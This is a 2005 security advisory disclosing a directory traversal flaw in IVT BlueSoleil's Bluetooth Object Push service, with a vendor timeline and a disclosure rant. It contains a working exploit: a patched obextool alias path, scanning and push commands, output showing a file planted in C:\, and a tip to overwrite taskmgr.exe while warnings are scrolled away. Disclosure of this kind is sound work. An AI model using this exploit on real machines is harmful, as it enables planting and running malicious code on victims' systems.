<<< Date Index >>>     <<< Thread Index >>>

DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'



DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'
Author: Kevin Finisterre
Vendor: http://www.bluesoleil.com/products/index.asp, 
http://www.ivtcorporation.com/
Product: 'IVT BlueSoleil 1.4'
References: http://www.digitalmunition.com/DMA[2005-0103a].txt

Description: 
90% of the USB Bluetooth dongles you find on the market will come with drivers 
from 
Widcomm. Out of the 7 dongles I own only one does not use some flavor of 
Widcomm. My 
SMC Networks SMC-BT10 came with IVT BlueSoleil 1.4 software. 

BlueSoleil for Windows is a set of Bluetooth Application Profiles implemented 
on the
Windows platform. BlueSoleil is fully compliant with the Bluetooth SIG's latest 
specifications. It can enable PCs to form networks and exchange information 
wirelessly. 
It can also provide PC's a fast and reliable solution for effortless wireless 
connections 
to mobile phones, headsets, PDA's, Access Points, Printers, Digital Cameras, PC 
peripherals, 
etc. BlueSoleil supports more than ten Bluetooth chip-sets and different HCI 
interfaces 
which include USB, UART, PCMCIA and Compact Flash. 

My BlueSoleil install was performed on a Windows XP SP2 machine using the above 
mentioned 
SMC-BT10. I chose all program defaults during the install. Upon rebooting my 
machine the 
"Welcome to Bluetooth" screen was displayed and I was asked for a device name 
and type. I 
was told that my security level was set to 'Medium' and that other devices must 
provide a 
Bluetooth passkey before connecting with my computer. I was given the option to 
disable this 
security authentication by simply unchecking a box and clicking ok to continue. 
My PDA can 
be pickey about using a pass key so I did go with 'Low' security. The 
BlueSoleil website 
mentioned that 'some old dongles my not support some operations' when dealing 
with using the 
key functions. This behavior could obviously prompt other users to set security 
to 'Low'. 

Regardless of the security setting you should know that it is possible for an 
attacker to 
take advantage of at least one vulnerability in the IVT software. All of my 
testing was done
on Version PTP-1.4.9-Win2k/XP-04.08.27 with Stack Version 04.03.11.20040827. I 
can not vouch
for the behavior of any other versions of BlueSoleil. Even connections that 
make use of 
pins are vulnerable.

By default the Object Push Service is Auto-started when BlueSoleil is opened. 
Any files that
are pushed to the device should show up in which ever directory the user 
specified during 
configuration. The default is C:\Documents and Settings\<username>\My 
Documents\Bluetooth\inbox

In order to exploit this issue all we need is a modified obextool.c from 
ussp-push-0.2:

@@ -316,7 +316,7 @@
        }

        filename = argv[1];
-       alias = basename(filename);
+       alias = "../../../../../../../../mal.exe";
        str2ba(argv[2], &bdaddr);
        channel = (argc > 3) ? atoi(argv[3]) : 10;

You obviously need a working bluetooth dongle on your machine. First scan for a 
device that 
*may* be running BlueSoleil. Archiving a list of known dongles that come with 
the install media 
would obviously be a good idea for future attacks. In the example below the 
machine 'jdam' is 
attacking 'threat-win32'. 

Scan for the machine. 
jdam:~# hcitool scan
Scanning ...
        00:11:B1:07:BE:A7       threat-win32

Verify that the Object Push service exists. 

jdam:/tmp/ussp-push-0.2# sdptool search OPUSH 00:11:B1:07:BE:A7
Inquiring ...
Searching for OPUSH on 00:11:B1:07:BE:A7 ...
Service Name: OPP Server
Service RecHandle: 0x10005
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 4
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100

Break out your modified obextool binary. Make use of the Channel listed in the
sdptool output. 

jdam:/tmp/ussp-push-0.2# ./obextool
Bluetooth OBEX tool
Usage:
        obextool [options] <command>
Options:
        -i [hciX|bdaddr]   Local HCI device or BD Address
        -h, --help         Display help
Commands:
        push   <file> <bdaddr> [channel]        Push a file

Pick your binary and send away! 

jdam:/tmp/ussp-push-0.2# ./obextool push calc.exe 00:11:B1:07:BE:A7 4
Sending object ...

For about 10 seconds the following messages are visible on the screen of the 
attacked 
device. The window only stores 3 messages however so its really easy to make 
them scroll 
by with some fake business card requests. 

* Remote device (00:20:E0:4C:CF:DF) has connected to my Object Push service!
* An object ../../../../../../../mal.exe is received. 
* Remove Device (00:20:E0:4C:CF:DF) has disconnected from my Object Push 
service!

jdam:/tmp/bt-tools# ~/qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -g 
anything.vcf

* Remote device (00:20:E0:4C:CF:DF) has connected to my Object Push service!
* Your Business card is sent on remote user's request.
* Remove Device (00:20:E0:4C:CF:DF) has disconnected from my Object Push 
service!

After the attack rather than being bound to the Bluetooth\inbox directory the 
binary is 
placed pretty much anywhere on the filesystem we want it. 

C:\>dir mal.exe
 Volume in drive C has no label.
 Volume Serial Number is F888-ED9A

 Directory of C:\

07/01/2005  09:28 PM           114,688 mal.exe
               1 File(s)        114,688 bytes
               0 Dir(s)  38,813,556,736 bytes free

Plenty of other variations are available and some may depend on the user that 
is logged into 
the system. 

You can obviously be creative and use anything that you think the either user 
or system may run.
alias = "../../../../../../../WINDOWS/System32/taskmgr.exe"; works real well. 
Especially
if the user misses the really obvious message on their console because you made 
it scroll by. 
Paranoid users tend to break out Task Manager pretty quick when something 
sketchy happens. Then
again perhaps a paranoid user would not have his bluetooth wide open?

I attempted to test IVT BlueSoleil for WinCE however it would not run on my 
device so I can 
not verify the bahavior there. 

I contacted the BlueSoleil staff multiple times after our initial exchange and 
for some reason
all attempts at contact resulted in zero answer. The initial response was so 
prompt I was 
surprised no one attempted to contact me further after multiple attempts on my 
part.

<rant>
Due to the fact that Bluetooth vendors are acting weird right now I don't even 
feel like 
playing the typical game that goes on in the disclosure process. A perfect 
example of this  
'weirdness' can be found with Widcomm / Broadcomm and the issues that 
pentest_co_uk partially 
disclosed last year. 90% of the bluetooth dongles you can buy in the store are 
vulnerable to attack
and the end user is totally the dark about it. Beacause of half assed 
disclosure and most likely 
some political BS I would estimate that LOADS of Bluetooth devices can be 
attacked. Good luck 
getting a software update for your Widcomm product, although new drivers are 
available the license.dat 
will give your dongle NO love. Some folks have even gone to the extreme of 
patching Widcomms licensing 
software just so they could use an update, they were however quickly smacked 
down:
http://www.wifi-forum.com/wf/archive/index.php/t-6631.html

Both version 3 (the one supposed to patch pentest_co_uk's issues) and version 4 
are out but chances 
are you are still vulnerable because you can't install the software. I hear you 
can bitch at some 
vendors enough that they will send you a new dongle that is licensed for newer 
software. I also hear
i its about like pulling teeth. Have you got a PDA? heh good luck. hrmm what 
was that line again,
'...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth 
software'. Alternately
users can 'set their Bluetooth device configuration to be non-discoverable or 
hidden.'. Please note 
however 'This will not stop the device from being vulnerable but it may limit 
the exposure.' 

If you use Bluetooth try to educate yourself about the software you are using 
and hound your vendor
for patches!
</rant>

All your Bluetooth are belong to greenplaque. 

Timeline associated with this bug:
03/24/2005 prompt and immediate response from support@xxxxxxxxxxxxxx inquiring 
about the bug 
03/24/2005 Object Push vulnerability disclosed to BlueSoleil Support with 
request for follow up.
03/28/2005 Request for an update and vendor confirmation of the bug. 
03/29/2005 Secondary ping for an update... surprised I did not get the same 
prompt response.
03/30/2005 Final ping and attempt to make sure the bug was understood by 
BlueSoleil staff.
03/31/2005 Message indicating disclosure based on lack of communication 
surrounding the issue.

Workaround:
'...(we) recommend that end users stop using the vulnerable BLUESOLEIL 
Bluetooth software'. Alternately
users can 'set their Bluetooth device configuration to be non-discoverable or 
hidden.'. Please note 
however 'This will not stop the device from being vulnerable but it may limit 
the exposure.' 

Short of the prompt response I got on the first day NO other attempts at 
communication were made 
by BlueSoleil staff. 

Other vendors are affected by similar issues and future advisories will be 
released. 

-KF 

@@ -316,7 +316,7 @@
        }

        filename = argv[1];
-       alias = basename(filename);
+       alias = "../../../../../../../../mal.exe";
        str2ba(argv[2], &bdaddr);
        channel = (argc > 3) ? atoi(argv[3]) : 10;